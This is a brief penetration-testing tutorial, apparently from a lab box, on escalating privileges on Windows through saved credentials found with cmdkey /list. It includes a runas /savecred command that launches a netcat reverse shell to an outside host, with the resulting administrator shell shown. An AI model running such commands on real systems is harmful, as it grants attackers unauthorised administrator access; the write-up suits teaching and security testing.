Stored Credentials

Stored credentials on a system allows for a user to run commands using those credentials and run the command as that user. If an administrator has saved credentials then think of it like sudo for windows.

Check for stored credentials with cmdkey /list:

C:\Users\security>cmdkey /list

Currently stored credentials:

Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator

To run commands using the stored credentials there is a program included with Windows called “runas.exe” located in System32. It is always best to use the full path to these executables to ensure we are executing the correct file and not bouncing to another file due to an environment variable.

Example running Netcat as Administrator:

C:\temp>C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred “nc.exe 10.10.14.27 4444 -e cmd.exe“
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.98] 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
access\administrator

Conclusion

cmdkey /list is an excellent tool to add to your post enumeration checklist. It is just like running sudo -l to hunt for a quick win.